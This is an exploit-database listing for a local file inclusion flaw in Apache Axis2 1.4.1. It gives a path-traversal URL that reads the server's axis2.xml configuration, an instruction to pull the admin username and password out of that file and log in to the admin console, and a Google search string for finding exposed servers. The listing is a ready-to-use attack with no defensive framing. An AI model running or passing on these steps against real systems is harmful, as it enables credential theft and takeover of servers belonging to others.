[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Apache Axis2(1.4.1) Local File Inclusion Vulnerability

Author
HC
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12375
Category
web applications
Date add
24-05-2010
Platform
php
======================================================
Apache Axis2(1.4.1) Local File Inclusion Vulnerability 
======================================================

 # Exploit Title: Apache Axis2(1.4.1) Local File Inclusion Vulnerability
    # Date: 2010/5/24
    # Author: HC
    # Software Link: http://ws.apache.org/axis2/download/1_4_1/download.cgi
    # Version: Axis2 1.4.1
    # Tested on: Linux
    # category: Webapps
    # Code :

       1.http://Domain Name/axis2/services/xxxxxxx?xsd=../conf/axis2.xml
       (ex: http://Domain Name/axis2/services/Version?xsd=../conf/axis2.xml)

       2. search  keyword "password". ?]Get username and password?^

          
       3. Login http://Domain Name/axis2/axis2-admin/   


       google: inurl:"axis2/services" "list Services"





#  0day.today [2024-11-16]  #